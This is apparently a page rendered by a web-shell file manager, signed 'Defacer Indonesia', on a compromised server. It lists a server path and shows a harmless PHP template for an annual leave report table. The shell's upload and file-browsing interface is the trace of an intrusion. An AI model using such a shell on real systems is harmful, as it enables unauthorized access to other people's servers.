whoami7 - Manager
:
/
home
/
kckglobal
/
cloud.kckglobal.net
/
modules
/
timesheets
/
views
/
reports
/
Upload File:
files >> /home/kckglobal/cloud.kckglobal.net/modules/timesheets/views/reports/annual_leave_report.php
<?php defined('BASEPATH') or exit('No direct script access allowed'); ?> <div id="leave-reports" class="hide reports_fr"> <table class="table table-leave-report scroll-responsive"> <thead> <tr> <th><?php echo _l('staffid'); ?></th> <th><?php echo _l('full_name'); ?></th> <th><?php echo _l('total_annual_leave'); ?></th> <th><?php echo _l('month_1'); ?></th> <th><?php echo _l('month_2'); ?></th> <th><?php echo _l('month_3'); ?></th> <th><?php echo _l('month_4'); ?></th> <th><?php echo _l('month_5'); ?></th> <th><?php echo _l('month_6'); ?></th> <th><?php echo _l('month_7'); ?></th> <th><?php echo _l('month_8'); ?></th> <th><?php echo _l('month_9'); ?></th> <th><?php echo _l('month_10'); ?></th> <th><?php echo _l('month_11'); ?></th> <th><?php echo _l('month_12'); ?></th> <th><?php echo _l('the_total_was_off'); ?></th> <th><?php echo _l('number_leave_days_allowed'); ?></th> </tr> </thead> <tbody></tbody> <tfoot> <td></td> <td></td> <td></td> <td></td> <td></td> <td></td> <td></td> <td></td> <td></td> <td></td> <td></td> <td></td> <td></td> <td></td> <td></td> <td></td> <td></td> </tfoot> </table> </div>
Copyright ©2021 || Defacer Indonesia